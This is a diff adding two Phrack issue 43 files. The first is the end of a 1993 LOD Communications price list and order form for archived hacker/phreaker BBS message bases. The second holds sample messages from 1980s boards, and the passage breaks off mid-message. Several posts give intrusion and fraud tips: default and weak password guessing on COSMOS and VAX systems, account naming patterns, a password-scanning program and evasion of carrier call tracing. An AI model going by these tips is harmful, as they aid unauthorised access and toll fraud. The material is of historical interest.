+weeks upon receipt of the order.
+
+
+FAQs (Frequently Asked Questions):
+----------------------------------
+
+   QUESTION:  How long will these Message Base Files be available?
+
+   ANSWER:  We cannot say for sure.  This is an ongoing effort and your support
+            will allow us to continue until we are satisfied with having
+            recovered the last decent scraps of messages out there.  Assuming
+            there is a demand for these messages, all H/P BBSes of WORTH (i.e.
+            NON-"codez" and NON-"warez" systems) are expected to be offered by
+            the end of the Summer of 1993.  A Guesstimate of what will be
+            offered is 80 to 100 Message Bases, half of which will be rather
+            partial.  Orders are expected to be filled up until the end of 1993
+            although this may change.  Regardless, we will send out
+            notification well in advance of ceasing operations.
+
+   QUESTION:  "Can I help out?  I have some old messages" (either on a C64,
+              Apple, IBM [best for us], or printout).
+
+   ANSWER:  Contact us ASAP!  We will work out an equitable agreement depending
+            on the quantity, quality, format, and "ancientness" of the
+            messages.  Your contribution will not go unrecognized.
+
+   QUESTION:  Say if I purchase BBS "X" which has 100 messages and the next
+              Version of your Price Listing shows BBS "X" now has 200 messages,
+              do I have to pay the for the first 100 all over again if I want
+              the other 100 messages?
+
+   ANSWER:  No.  If a small number of additional messages are added, they will
+            be sent for the price of a diskette and postage only, i.e. the
+            information will be free.  If a larger number such as 100 new
+            messages are added, then if you previously purchased the message
+            base, the additional messages will be discounted.  Those who pay
+            the Commercial Rate (corporations, government, etc.) will receive
+            updates of the purchased Volume for FREE regardless of how many new
+            messages there are, and LODCOM also pays for the postage and
+            diskette(s).
+
+   QUESTION:  What if I purchase the minimum order now and, when the next
+              Version of the price list is released, I want to get more Message
+              Bases?  Do I have to still pay the $20.00 minimum?
+
+   ANSWER:  No.  If you are a previous customer, the minimum is cut in half,
+            that is, $10.00.  Commercial customers who bought Volume #1 (the
+            current "Complete Set"), are obviously not obligated to purchase
+            the added Message Bases (the next Volume).
+
+   QUESTION:  I would really like to get a feel for what one or two of the
+              boards were like before I order them.  Can I get more info?
+
+   ANSWER:  Yes.  A Sample of Actual Messages is available by performing the
+            following, so long as you have TELNET access to the Internet:
+
+   Telnet to:  198.67.3.2      [IP Address for PHANTOM.COM]
+   Type:       mindvox         [To enter the Mindvox system]
+   login as:   guest           [To look around]
+   At prompt:  finger lodcom   [To see our Sample Messages File]
+
+   If you do not have TELNET access to the Internet, AND your host will NOT
+"bounce" a 50K file, Lodcom will send you the Sample Messages File if you
+specifically request it.
+
+
+The Price List:
+---------------
+
+ LOD Communications (c) 1993: Price List of Hack/Phreak BBS Message Bases
+ ----------------------------------------------------------------------------
+ BBS NAME           A/C  SYSOP(S)        # MSGS   DATES      KBYTES   PRICE
+ ----------------------------------------------------------------------------
+ Alliance BBS       618  Phantom Phreaker  113    2/09/86 -   215    $ 3.00 B
+                         Doom Prophet      G,P    6/30/86
+
+ Black Ice Private  703  The Highwayman    880    12/1/88 -   580    $ 7.00 B
+                                           P,U    5/13/89
+
+ Broadway Show/     718  Broadway Hacker   180    9/29/85 -   99     $ 3.00 B
+ Radio Station BBS                                12/27/85
+
+ CIA BBS            201  CIA Director      30     5/02/84 -   30     $ 1.00
+                                                  6/08/84
+
+ C.O.P.S.           305  Mr. Byte-Zap      227    11/5/83 -   196    $ 4.00 B
+                         The Mechanic      G,R,U  7/16/84
+
+ Face To Face       713  Montressor        572    11/26/90 -  400    $ 2.00 B
+                         Doc Holiday *            12/26/90
+
+ Farmers Of Doom    303  Mark Tabas        41     2/20/85 -   124    $ 2.00 B
+                                           G      3/01/85
+
+ Forgotten Realm    618  Crimson Death     166    3/08/88 -   163    $ 3.00 B
+                                                  4/24/88
+
+ Legion Of Doom!    305  Lex Luthor        194    3/19/84 -   283    $ 6.00 B
+                         Paul Muad'Dib *   G,P,U  11/24/84
+
+ Metal Shop Private 314  Taran King        520    4/03/86 -   380    $ 4.00 BD
+                         Knight Lightning  P,R,U  5/06/87
+
+ OSUNY              914  Tom Tone          375    7/9/82 -    368    $ 8.00 B
+                         Milo Phonbil *    G,U    4/9/83
+
+ Phoenix Project    512  The Mentor        1118   7/13/88 -   590    $ 4.00 B
+                         Erik Bloodaxe *   G,R    2/07/90
+
+ Plover-NET         516  Quasi Moto        346    1/14/84 -   311    $ 5.00 B
+                         Lex Luthor *      G      5/04/84
+
+ Safehouse          612  Apple Bandit      269    9/15/83 -   251    $ 4.00 B
+                                           G,U    5/17/84
+
+ Sherwood Forest I  212  Magnetic Surfer   92     5/01/84 -    85    $ 2.00 B
+                                           P,U    5/30/84
+
+ Sherwood Forest ][ 914  Creative Cracker  100    4/06/84 -    239   $ 3.00 B
+                         Bioc Agent 003 *  G      7/02/84
+
+ Split Infinity     408  Blue Adept        52     12/21/83 -   36    $ 1.00 B
+                                                  1/21/84
+
+ Twilight Phone     ???  System Lord       17     9/21/82 -    24    $ 1.00
+                                                  1/09/83
+
+ Twilight Zone/     203  The Marauder      108    2/06/85 -   186    $ 3.00 B
+ Septic Tank             Safe Cracker *    G,U    7/24/86
+
+ WOPR               617  Terminal Man      307    5/15/84 -   266    $ 6.00 B
+                         The Minute Man *  G,U    1/12/85
+ _____________________________________________________________________________
+
+NOTES:  In SYSOP(S) column, * indicates remote sysop.
+
+        In #msgs column, P indicates that the BBS was Private, R indicates BBS
+        was public but restricted access sub-board(s) are included, G indicates
+        that SOME (or maybe all) of the G-files written by the sysop and/or
+        files that were available on the BBS are included, U indicates that a
+        BBS Userlist (typically undated) is included.
+
+        DATES column shows the starting and ending dates for which messages
+        were buffered (and therefore available) although there may be some gaps
+        in the chronological order.
+
+        KBYTES column shows size of complete file containing messages, g-files,
+        userlist, etc.  COST column indicates current cost of message base in
+        U.S. Dollars, "B" indicates that a "BBS Pro-Phile" was written and is
+        included, "D" indicates that 100% of all orders for that BBS (Metal
+        Shop Private) will be donated to help pay for Craig Neidorf's (Knight
+        Lightning) Legal Defense bills.
+
+LODCOM is currently organizing and splicing messages from over 30 more H/P
+BBSes [shown below] and, as the files are completed and/or as additional
+messages are procured for the above systems, updates of this listing will be
+released.  Next release is expected some time in JUNE of 1993: Modem Over
+Manhattan (MOM), 8BBS (213), Mines of Moria (713), Pirates Cove (516) sysop:
+BlackBeard, Catch-22 (617) sysop: Silver Spy, Phreak Klass 2600 (806) sysop:
+The Egyptian Lover, Blottoland (216) sysop: King Blotto, Osuny 2 (a.k.a. The
+Crystal Palace) (914), The Hearing Aid, Split Infinity (408), (303) sysop: The
+ShadowMaster, ShadowSpawn (219) sysop: Psychic Warlord, IROC (817) sysop: The
+Silver Sabre, FreeWorld II (301) sysop: Major Havoc, Planet Earth, Ripco (312)
+sysop: Dr. Ripco, Hackers Heaven (217) sysop: Jedi Warrior, Demon Roach
+Underground (806) sysop: Swamp Ratte, Stronghold East Elite (516) sysop: Slave
+Driver, Pure Nihilism, 5th Amendment (713) sysop: Micron, Newsweek Elite (617)
+sysop: Micro Man, Lunatic Labs (415) sysop: The Mad Alchemist, Laser Beam
+(314), Hackers Den (718) sysop: Red Knight, The Freezer (305) sysop: Mr. Cool,
+The Boca Harbour (305) sysop: Boca Bandit, The Armoury (201) sysop: The Mace,
+Digital Logic's Data Center (305) sysop: Digital Logic, Asgard (201), The KGB,
+Planet Earth (714), PBS (702), Lost City of Atlantis sysop: The Lineman, and
+more.
+
+
+Hacking/Phreaking Tutorials a.k.a. "G-Philes":
+----------------------------------------------
+
+   Along with the above H/P BBS Message Bases, LODCOM has collected many of the
+old "philes" that were written and disseminated over the years.  A list of all
+of them would take up too much space here, however, we can tell you that the
+majority are NOT files that were originally written for electronic newsletters
+such as Phrack, PHUN, ATI, etc. (with the perhaps obvious exception of the
+LOD/H Technical Journal).  Those files/newsletters are readily available from
+other sources.  This hodgepodge of files includes files from Bioc Agent 003,
+Legion of Doom members, and many others that somehow fell out of widespread
+circulation.  A Table of Contents of the collection is included but the
+tutorials are all grouped together in four large files of approximately 250K
+each.  This collection will have additions with each update of this file.  See
+the order form for the price (price will go up as more files are added).
+
+
+The Order Form:
+---------------
+
+- - - - - - - - - - - - - - - C U T - H E R E - - - - - - - - - - - - - - - -
+
+               LOD Communications H/P BBS Message Base ORDER FORM
+               ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+   PERSONAL RATE:  Due to the economics involved in diskettes, disk mailing
+containers, snail mail costs, and time to fill orders, a MINIMUM ORDER of
+$20.00 is required for all personal requests.  If all 20 message bases are
+ordered (containing 5700+ messages), the cost is discounted to $39.00; if you
+order $20.00 worth (the minimum) or more, you get $5.00 worth in addition as a
+discount.  That is, pay for $20.00 and get $25.00 worth of message bases.
+
+   COMMERCIAL RATE:  Corporations, Universities, Libraries, and Government
+Agencies must order the complete set (Volume #1) and pay a higher rate.  For
+Price Listing Version #1 Released 5/15/93 (20 boards total), the price is
+$99.00 (note that new messages that surface for any BBS purchased will be sent
+completely FREE of ANY additional charge).
+
+H/P BBS Names:   ____________________________________________________________
+
+[Write: COMPLETE ____________________________________________________________
+ SET if you want
+ all messages]   ____________________________________________________________
+
+
+"G-Phile" Collection Version #1 (Optional): $____________ ($10.00 Personal)
+                                                          ($25.00 Commercial)
+
+Disk Format/Type of Computer: _____________________________________
+(Please be sure to specify diskette size [5.25" or 3.5"] and high/low density)
+
+File Archive Method (.ZIP [preferred], .ARJ, .LHZ, .Z, .TAR) ____________
+                    (ASCII [Non-Compressed] add $2.00 to order)
+
+Texas Residents add 8% Sales Tax.
+If outside North America please add $5.00 for Shipping & Handling.
+
+Total Amount (In U.S. Dollars): $ ___________
+
+Payment Method:  Check or Money Order please.
+Absolutely NO Credit Cards, even if it's yours :-)
+
+By purchasing these works, the Purchaser agrees to abide by all applicable U.S.
+Copyright Laws to not distribute or reproduce, electronically or otherwise, in
+part or in whole, any part of the Work(s) without express written permission
+from LOD Communications.
+
+Send To:
+          Name: _____________________________________
+
+  Organization: _____________________________________ (If applicable)
+
+        Street: _____________________________________
+
+City/State/Zip: _____________________________________
+
+       Country: _____________________________________
+
+E-mail address: _____________________________________ (If applicable)
+
+
+PRIVACY NOTICE:  The information provided to LOD Communications is used for
+sending orders and periodic updates to the H/P BBS Message Base Price List.
+It will NOT be given or sold to any other party.  Period.
+
+- - - - - - - - - - - - - - - C U T - H E R E - - - - - - - - - - - - - - - -
+
+Remit To:   LOD Communications
+            603 W. 13th
+            Suite 1A-278
+            Austin, Texas USA  78701
+
+Lodcom can also be contacted via E-mail:  lodcom@mindvox.phantom.com
+                             Voice Mail:  512-448-5098
+ _____________________________________________________________________________
+ End Order File V.1
+
+LOD Communications: Leaders in Engineering, Social and Otherwise ;)
+
+Email: lodcom@mindvox.phantom.com
+Voice Mail: 512-448-5098
+Snail Mail: LOD Communications
+            603 W. 13th
+            Suite 1A-278
+            Austin, Texas USA 78701
diff --git a/phrack43/19.txt b/phrack43/19.txt
new file mode 100644
index 0000000..8510968
--- /dev/null
+++ b/phrack43/19.txt
@@ -0,0 +1,1389 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Three, File 19 of 27
+
+                Lodcom Sample Messages Set #1, 4/20/93
+ 
+   In order to provide a better feeling for the content of what the LOD
+Communications Underground Hack/Phreak BBS Message Base Archives contain, 31
+messages were selected from the overall collection of posts for 5 Boards.
+Note that the samples contained herein are fairly typical and are but a very
+small fraction of the 5000+ messages from over 50 systems that LODCOM currently
+possesses. Additional BBS's and messages are being added constantly. Consult
+the Price Listing [First Version due to be released in Late April 1993 and
+periodic additions thereafter] for an up-to-date catalog of our holdings and
+costs (minimal).
+ 
+ 
+   The selection of messages in Set #1 are from the following Systems:
+                                                           
+   H/P BBS Name        A/C   Sysop(s)                           Circa
+-----------------------------------------------------------------------------
+   OSUNY               914   Tom Tone & Milo Phonbil            1982/83
+   WOPR                617   Terminal Man & The Minute Man      1984/85         
+   Phoenix Project     512   The Mentor & Erik Bloodaxe         1988/89/90
+   The Twilight Zone   203   The Marauder & SafeCracker         1985/86
+   Black Ice Private   703   The HighwayMan & The Mentor        1988/89
+_____________________________________________________________________________   
+              
+ 
+H/P BBS Message Bases to be available in the near future (in addition to
+the above five) are:
+ 
+8BBS (213) Circa 1980/81, Modem Over Manhattan (MOM), Twilight Phone (1982), 
+Legion of Doom! (305) sysop: Lex Luthor, Plover-NET (516) sysop: Quasi Moto,
+Sherwood Forest II (914) co-sysop: Bioc Agent 003, Alliance BBS (618) sysop:
+Phantom Phreaker, Catch-22 (617) sysop: Silver Spy, Blottoland (216) sysop:
+King Blotto, Osuny 2 (aka The Crystal Palace) (914), Mines of Moria (713),
+Pirates Cove (516) sysop: BlackBeard, The Hearing Aid, Split Infinity (408),
+Farmers of Doom! (303) sysop: Mark Tabas, Shadowland (303) sysop: The
+ShadowMaster, Metal Shop Private (314) sysops: Taran King and Knight Lightning,
+ShadowSpawn (219) sysop: Psychic Warlord, IROC, FreeWorld II (301), Planet
+Earth (714), The C.O.P.S. (305), Ripco (312) sysop: Dr. Ripco, Hackers Heaven
+(217) sysop: Jedi Warrior, Demon Roach Underground, Stronghold East Elite (516)
+cosysop: Slave Driver, Pure Nihilism, 5th Amendment (713), Newsweek Elite
+(617), Phreak Klass 2600 (806), Lunatic Labs (415), Laser Beam (314), Hackers
+Den, The Freezer (305) sysop: Mr. Cool, The Boca Harbour (305) sysop: Boca
+Bandit, The Armoury (201) sysop: The Mace, Digital Logic (305), Asgard (201),
+The CIA bbs, The KGB bbs, Face to Face (1990), Broadway Show (718) Sysop:
+Broadway Hacker, The Safehouse (612) circa 1983/4, Lost City of Atlantis (215),
+The Private Sector (2600 sponsor BBS), and more.
+ 
+ 
+This message constitutes explicit Permission by LOD Communications to
+disseminate this File containing 31 actual messages from our Copyrighted
+(c) 1993 collection of H/P BBS Message Bases so long as the contents are not
+modified. No part of this File may be published in print without explicit
+permission by Lodcom.
+ 
+ 
+                      Lodcom Sample H/P BBS Messages:
+                      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ 
+*** {OSUNY (914) Sysop(s): Tom Tone and Milo Phonbil (both wrote for TAP)} ***
+    *** {Osuny is perhaps the most legendary Phreak Board of all time} ***  
+ 
+ Msg.:118 
+ Date:10/5/82 
+ From:MILO PHONBIL
+   To:ALL
+About:STANFORD STUFF
+ 
+Greetings, Stanford phreaks! 
+  
+   It seems that those "strange" numbers
+ are really ones that 
+will appear if another person is signed 
+on to the same id. 
+(Like AA.TEG AA.TEG#2 AA.TEG#3 and so on
+.) Also, while there 
+is no MAIL facility available to "GUEST"
+ accounts, there is 
+a way to send a one-liner to someone els
+e. The command format 
+is:  TO gg.uuu msg   
+Where gg.uuu is the person's id, and the
+ msg is of course, 
+the message. Also, their SPIRES database
+ is quite 
+interesting! Type CALL SPIRES, then SHOW
+ SUBFILES. Then you 
+must SELECT a subfile. For a complete tu
+torial, try: 
+TUTORIAL MASTERLIST 
+SPIRES is ended by typing EXIT at the ->
+ prompt. 
+  
+Later, MILO PHONBIL 
+ 
+ 
+ 
+Msg.  :180  
+About :MAINFRAMES
+>From  :DATA BANDIT
+To    :ALL PHREAKS
+Date  :2/23/83  00:00
+ 
+OK PHREAKS....YOU NEED HELP ON TSO
+FORMATS,SPF FORMATS,GDDM FORMATS?
+THIS IS THE GUY TO ASK....I'M DAMN
+GOOD AT IT...I WORK AS AN OPERATOR
+ON SUCH SYSTEMS AND KNOW THESE BABIES
+LIKE I KNOW MY OWN FACE....SO IF YOU
+NEED HELP...JUST DROP ME A LINE HERE
+OR ON MY BOARD....303-xxx-3015....
+24 HRS.....I CAN SHOW YOU HOW TO SET
+UP A PROGRAM ONCE ON IT TO DUMP ALL
+SYSTEM PASSWORDS AND ALL DATASET
+PASSWORDS...ETC...SET UP YOURT
+OWN USER ID...THE WHOLE 9 YARDS...
+I HAVE MY COMPANY BY THE F*CKING
+BALLS! SO I CAN TEACH YOU TOO....
+JUST ASK ME.....
+   
+        THE ONE AND ONLY
+           DATA BANDIT
+           ][][ ][][][
+  
+   ON A MAINFRAME NEAR YOU!
+ 
+ 
+---------------\-/-----------------
+                ?
+ 
+MEMBER P.H.A.
+ 
+ 
+Msg.  :396  
+About :PHREAK BBS ON THE SOURCE!!!
+>From  :MAXWELL WILKE
+To    :ALL
+Date  :3/25/83       
+ 
+Well, believe it or not, there is alread
+y two small phreak
+BBS's on The Source!!!  They have traded
+ some minor info,
+including some Sprint codes, and other s
+uch folly.  But
+the thing is, it's there, has been there
+ since october '82,
+and The Source knows about it, and they 
+don't care!
+the BBS's are on the Source's PARTIcipat
+e, which, admitedely,
+is a very large, powerful "thing."  In a
+ddition to the
+two on there now, I took the liberty to 
+create my own, entitled
+the "P-MENU.SAV GROUP".  It is Conferenc
+e # 83.3257 .
+ 
+Any CompuServe conference members out th
+ere interested in
+moving over to PARTIcipate on The Source
+, let me know.
+If you do not have instructions on it, I
+'ll mail 'em to you
+if you give me your address.  I'll see w
+hat I can do about
+getting some more Source accounts.  A fr
+iend of mine
+listed 'em all!  
+ 
+                    later,
+                      MW
+ 
+P.S.  To all fans of my modifications to
+ The Source:
+      Sorry, the good 'ole boys at STC p
+icked up on what
+      i did to them (Snicker... haw.. ha
+w) and they cor- 
+      rected my modifications.  i put 'e
+m back, and they
+      fixed 'em again, etc, etc, until t
+hey finally looked
+      up in their PR1MENET REFERENCE MAN
+UAL and figured out
+      how to protect their accounts!  Oh
+ well...
+ 
+ 
+Msg.  :476  
+About :BAD NEWS
+>From  :THE HACKER
+To    :ALL
+Date  :4/8/83        
+ 
+BAD NEWS SPRINT IS AT IT AGAIN THEY JUST CAUGHT SOMEONE
+LAST NIGHT NOW THEY ARE GOING FOR A SECOND KILL 
+THEY ARE GOING AFTER ZERO PAGE THEY HAVE BEEN CALLING AROUND
+ABOUT SO IF ANYONE OUT THERE KNOWS HIM TELL HIM THAT
+THEY ARE CALLING AROUND NOW THAT SPRINT AND MCI ARE OUT TO GET
+ALL OF THE PHREAKS DOES ANYONE HAVE ANY GOOD SERVICES THAT
+ARE SAFE I AM USING ITT
+HOW SAFE IS THAT???
+ 
+PLEASE RESPOND BACK SOMEBODY!
+ 
+ 
+                        THE
+                          HACKER
+ 
+       [*]THE INNER CIRCLE[*]
+          =-=-=-=-=-=-=-=-
+ 
+ 
+Msg.  :519  
+About :SPRINT/MCI/OTHER BUGGERS
+>From  :ROGER OLSON
+To    :ALL
+Date  :4/17/83       
+ 
+I highly recommend the proceedure mentio
+ned here earlier for
+staying OUT OF TROUBLE with "the competi
+tion". Look for your
+own passwords. Don't use the ones posted
+ on BBS's except maybe
+once, to "get a feel" of how the particu
+lar switch works. If
+possible, test the codes between 8 - 11 
+AM to detirmine if they
+are business codes or not. When possible
+, use a local loop to
+call into/out of to the switch you are u
+sing. This simply adds
+more frustration in the event anyone is 
+tracing. When possible,
+STAY AWAY completely from these OCC's, o
+pting instead to use the
+Wats lines from large companies, via the
+ir remote call in ports.
+You always want to stay away from system
+s that individually 
+account for each call, as MCI/Sprint do.
+ WATS lines, on the
+other hand, especially in older exchange
+s, do not record every
+number called - just the total time the 
+line was in use, in
+hours per month. In either case....have 
+your phun now!! Cause
+after the Final Judgement and Settlement
+ is implemented next
+year, you will place <<all>> long distan
+ce calls by merely
+dialing the number desired, and entering
+ a two digit "choice
+of carrier" code (for ATT, MCI, Sprint, 
+Allnet, etc) and your
+local central office will use ANI to sup
+ervise your call! The
+outfits like MCI will discontinue dealin
+g with the public as
+such, and will only deal <with other tel
+ephone companies> who
+in turn will act like billing/collection
+ agents for MCI, etc.
+Watch and see! The times are changing! N
+o more phucking around!
+ 
+ 
+ 
+ Msg.:  211 
+ Date: 10/17/82
+ From: ROBERT ALLEN
+   To: ALL
+About: WHITE HOUSE
+ 
+IF ANY OF  YOU ARE WONDERING,
+800-424-9xxx IS WHAT IS 
+KNOWN AS THE WHITE HOUSE SIGNAL (SWITCH
+BOARD), 
+AND IT IS RELATIVELY NASTY/FUN, IF ONE 
+KNOWS ALL OF THE 
+SILLY CODEWORDS TO USE.. A FRIEND AND 8 
+OTHER PHREAKS 
+GOT TRICKY DICK OUT OF BED AT 2:30 AM, 
+BY ASKING FOR "OLYMPUS". I HEAR THERE
+ARE TAPES OF THE CALL FLOATING AROUND... 
+800-424-9xxx IS A WH. HOUSE PRESS RECORD
+ING,THAT CAN BE QUITE 
+FUN, IF YOU LIKE RON'S SPEECHES EARLY...
+ 
+                DIAL ANYWHERE, 
+                BUT DIAL WITH CARE 
+                --BOB-- 
+ 
+ 
+ 
+Msg.  :111  
+About :***WARNING!!!***
+>From  :JIMMY HOFFA
+To    :***PHELLOW-PHREAKERS***
+Date  :2/19/83  00:00
+ 
+"FOR ALL YOU *PHELLOW-PHREAKERS* OUT THERE......
+there seems to be some "negativeness" out there from a few
+select peo`le!. WELL, For one thing "THEY" must realize
+A "*PHREAKER*" IS *NEVER* "*NEGATIVE*" (TAKE NOTE!!.
+RODGER-OLSON!!).. We ARE A SELECT BREED WHO HAVE BEEN
+BLEd WITH A REAL UNSATISFYING "THIRST" FOR..
+"@KNOWLEDGE*" and Willing to share with "PHELLOW-PHREAKERS".
+WE CAN DO ANYTHING *MA* CAN DO, ONLY WE CAN DO IT BETTER!!!!!
+WHO NEEDS "PESSIMISM" ANYWAY???? DID PESSIMISTs HELP BUILD OUR
+COUNTRY, OUR COMPUTERS, OUR WORLD AROUND US???
+NO!!! POSITIVE THINKERS DID, THAT'S WHO!!! PEOPLE WHO HAVE A
+NEVER-ENDING THIRST FOR KNOWLEDGE, CHALLENGE, AND FOUND NEW
+IN-ROADS TO HELP BETTER OURSELVES!!!
+THESE ARE WHAT "I" CALL THE "*REAL*" "PHREAKERS"!!! HOW ABOUT
+YOU!!! WE CAN TURN NEGATIVES TO POSITIVES EASIER THAN MOST CAN
+BRUSH THEIR TEETH! WE DON'T NEED NEGATIVES BECAUSE THERE'S
+ALREAXDY TOO MANY OUT THERE! WHAT WE NEED IS MORE PEOPLE WITH
+A POSITIVE-MENTAL-ATTITUDE THAT CAN HELP FURTHER OUR
+QUEST FOR KNOWLEDGE GAINING A SATISFACTION UNBEKNWNST to
+"NEGATIVE"-"PESIMISTIC" PEOPLE!
+HAD TO SAY IT AND I DON'T REGRET IT!
+THIS WAS A>>>>>>
+****PUBLIC************
+****SERVICE************
+***ANNOUNCEMENT*****************
+ 
+ 
+_____________________________________________________________________________
+ 
+ *** {WOPR (617) SYSOP: Terminal Man. WOPR was a private phreak board and} *** 
+     *** {was considered one of the best H/P systems of the time. The} ***
+       *** {following Messages are from 1984 unless stated otherwise} ***
+ 
+ 
+Message #33: QUORUM
+Msg left by: KING BLOTTO
+Date posted: TUE MAY 29  3:13:14 PM   {1984}
+ 
+ 
+TO ALL MY SUBJECTS:
+ 
+       THIS TOPIC IS ABOUT CONFERENCES.
+AS MANY OF YOU KNOW, I DON'T CONFERENCE
+ANYMORE SINCE INFOWORLD PUT OUT AN
+ARTICLE ON IT ON MARCH 26. THE REASON
+BEING: THERE ARE N-O SAFE EXCHANGES
+BEING USED TODAY. EVERYONE SAYS; "BUT
+THIS IS CHICAGO", "THIS IS A DALLAS
+EXCHANGE", "THEY CAN'T TRACE CONFEREN-
+CES!". THE LAST ONE IS MY FAVORITE. THE
+SYSTEM USED BY ALMOST EVERYONE TODAY IS
+ALLIANCE TELECONFERENCE. THIS IS NOT
+BELL OPERATED. QUORUM IS THE BELL CONF.
+SYSTEM. AND IT'S WORSE THAN ALLIANCE.
+NEWS HAS IT, THAT ALLIANCE TELECON-
+FERENCE MIGHT BE GOING UNDER NOW. BUT
+THEY HAVE STARTED TAKING PEOPLE WITH
+THEM. ( 5 TO DATE, AS I KNOW) ALLIANCE
+IS SUPER-PISSED, WELL, WOULDN'T YOU BE?
+AND ESPECIALLY AFTER EVERY LITTLE 15YR
+OLD LEARNS HOW TO START ONE UP, HE'LL
+BE JUST GETTING THEM MORE PISSED OFF.
+THE ABUSE HAS GROWN TO A MAXIMUM. I AM
+TRYING TO FIND OUT ALL I CAN ON 
+QUORUM AT WORK. I'LL POST THE INFO AS
+IT COMES IN.
+ 
+ 
+                        MAJESTICALLY,
+ 
+                         KING BLOTTO
+ 
+P.S.- READ THE 3/26/84 INFOWORLD!
+ 
+ 
+ 
+<1-48 LAST=33 E=mail Q=Quit T=Titles>
+ 
+ 
+---------------------------------
+69> COSMOS & UNIX
+---------------------------------
+Msg left by: BIOC AGENT 003
+Date posted: MON AUG  6 11:18:23 AM
+ 
+COSMOS is basically a modified UNIX sys
+tem.  When a non-priviledged COSMOS
+user logs on, a program usually called 
+/BIN/PERMIT is run.  This tells the
+system which COSMOS commands the user i
+s allowed to use.
+ 
+On the other hand, when a priviledged u
+ser logs in (ie, root, sys, bin, or
+preop), he is put into the normal UNIX 
+shell (SH) where he can utilize
+UNIX commands such as:  who & cat /etc/
+passwd (which will printout the 
+password file).  These users can also t
+ype CHDIR /USR/COSMOS and use ANY of
+the COSMOS commands since COSMOS is rea
+lly a sub directory in a UNIX system.
+They also have a bad (good?) habit of l
+eaving administrative notices and files
+(such as the decrypted passwords) layin
+g around in different directories of
+the system.  In fact, one system down i
+n Washington, DC has a BIN account
+with no password (!) until some ASSHOLE
+ decided to change the message of the
+day"I broke in, ha, ha  --Joe Smuck"!!!
+ 
+If you can't get into one of the privil
+edged accounts then you might as well
+try for a regular COSMOS account.  The 
+typical setup is two letters followed
+by 2 numbers.  Here are a few common on
+es:
+ 
+ 
+TRxx (TRaining -- eg, TR01, TR02, etc.)
+LSxx(Lac Staff)
+LA   (Line Assignement)
+FMxx (Frame Manager)
+NMxx (NAC Manager)
+RSxx (Repair Service)
+LMxx (LMOS debug)
+etc...
+ 
+You best bet would be too go for one of
+ the managers accounts such as NM01.
+There is also usually a user-name of CO
+SMOS on the system.
+ 
+The passwords are usually pathetic.  Tr
+y things such as:  COSMOS, FRAME, TELCO,
+etc.)  Also try simple words such as:  
+CAT, BAT, RAT, etc.
+ 
+You'll have to guess at the Wire Center
+, though (WC).  It will always b 2 
+letters.
+ 
+Excelsior,
+ 
+ 
+---------------------------------
+ 
+1-79 LAST=69
+[E]mail
+[A]bort
+[T]itles
+:
+ 
+---------------------------------
+78> Intro To C Search
+---------------------------------
+Msg left by: LORD DIGITAL
+Date posted: FRI AUG 17  6:20:13 AM   {1984}
+ 
+Ok what the program "C PW Scanner",  or
+ "The C Search" does is fairly 
+simple. It reads through the main passw
+ord file searching for a match between 
+A person's name and password and compar
+es the two. If they match, or if
+a person's pw is simply his name spelle
+d backwards. it will write the 
+pw's into a file name of your choice. T
+his should net you several paswords
+for every scan at least. The percentage
+ of stupid people on any given 
+system is usually quite high. The entir
+e search should take about 5 mins.
+Obviously it can't do too much consider
+ing everything is crypted...
+ 
+The entire program is internal, and ass
+umes you have at least one accnt.
+allready present on the system in quest
+ion.
+ 
+Instructions :>
+     Pretty simple, all you do is: Uplo
+ad the text file, use the CC (Compile
+     C) utility, which will give you th
+e "a.out" (assembly out), now just
+     rename the file (mv) to whatever y
+ou wish to call it...
+ 
+If anyone wants to trade various C prog
+rams (trojan horses (not that kind),
+programs that search for ports with out
+dial capabilty, etc...) leave e-mail
+ 
+                                       
+                  later-
+ 
+      .../\^ lord digital ^/\...
+             ------------
+         -Spectral -- Phorce-
+ 
+ 
+---------------------------------
+ 
+1-90 LAST=78
+[E]mail
+[A]bort
+[T]itles
+:
+---------------------------------
+83> the old fashioned way...
+---------------------------------
+Msg left by: BIG BROTHER
+Date posted: FRI AUG 17 10:36:45 PM
+ 
+  It might be just as easy when hacking
+ idiot's passwords (User Name, same 
+again; first name, same again; etc.) to
+ do it the old-fashioned way--by hand.
+Hey, in half an hour I found 15 account
+s on my 'private' 617 VAX VMS 3.6.
+Some of them are even partially privili
+ged.
+  Another thing, always try default pas
+swords.  If the system lets priv'gd
+users log in thought dial-in lines and 
+the default psswds are still there,
+you've struck gold.  As the wise man sa
+y, "Keep it to yourself."  I once
+the phone number to a Ztel Prime system
+ (linked to Primenet which eventually
+links to milnet) with my operator accou
+nt (User:OPERATOR, no password--default)
+ to a few people.  They abused the acco
+unt(created 10 or 15 other accts for 
+themselves) and it died within days....
+---------------------------------
+ 
+1-90 LAST=83
+[E]mail
+[A]bort
+[T]itles
+:
+---------------------------------
+85> Pissed As SHIT!
+---------------------------------
+Msg left by: SHARP RAZOR
+Date posted: SAT AUG 18  4:09:16 AM
+ 
+That is right! i finally have the time
+and sit down and work with my Wash. DC 
+BIN and PREOP accounts, and 'lo and 
+behold...i call up (i hadn't called for
+about 5 days) and the #'s were changed.
+...not 1..but all 4 dial-ups!!
+Talk about an abused system! Some of yo
+u may not know it, but someone logged
+on and left a cute logon bulletin to
+all the AT&T bus. people, etc...that
+went sort of like 'haha, Kilroy wuz
+here!'...(real cute and intelligent,
+huh??)..besides that...there were times
+when I would call at 2AM on a weekday,
+and see 15-20 people on-line...
+...and all on the same account!!!
+(since the # is changed, I can say it
+WAS the MF01 act. they were using)
+Let this be a lesson NOT to go around
+POSTING COSMOS dial-ups on anything
+besides a very private BBS,and especial
+ly not the pw's!...I KNOW that the
+lower level accounts were given away..
+..but I hope at least the sysop ones
+weren't..in any case this really shows
+me not to be so liberal when I hand
+out COSMOS pw's again.
+..Later..
+..Sharp Razor>>
+ The Legion of Doom!
+ 
+(dont worry, I am just a bit po'ed now,
+but I MAY get over it!!)
+---------------------------------
+ 
+1-90 LAST=85
+[E]mail
+[A]bort
+[T]itles
+:
+ 
+ 
+Message #87: MORE ESS
+Msg left by: PAUL MUAD'DIB
+Date posted: TUE JUN 19  2:59:05 PM
+ 
+ 
+I've got many switch and frame #'s to
+trade, and here's a fun way to get pw's
+or destroy bbs's-
+ call the switch and do what I said 
+ in msg 78 asking for call forwarding
+ on an anonymous # (NOT your local tym-
+ or tele- nets, they DO know them to be
+ special dials)..when he puts it in, 
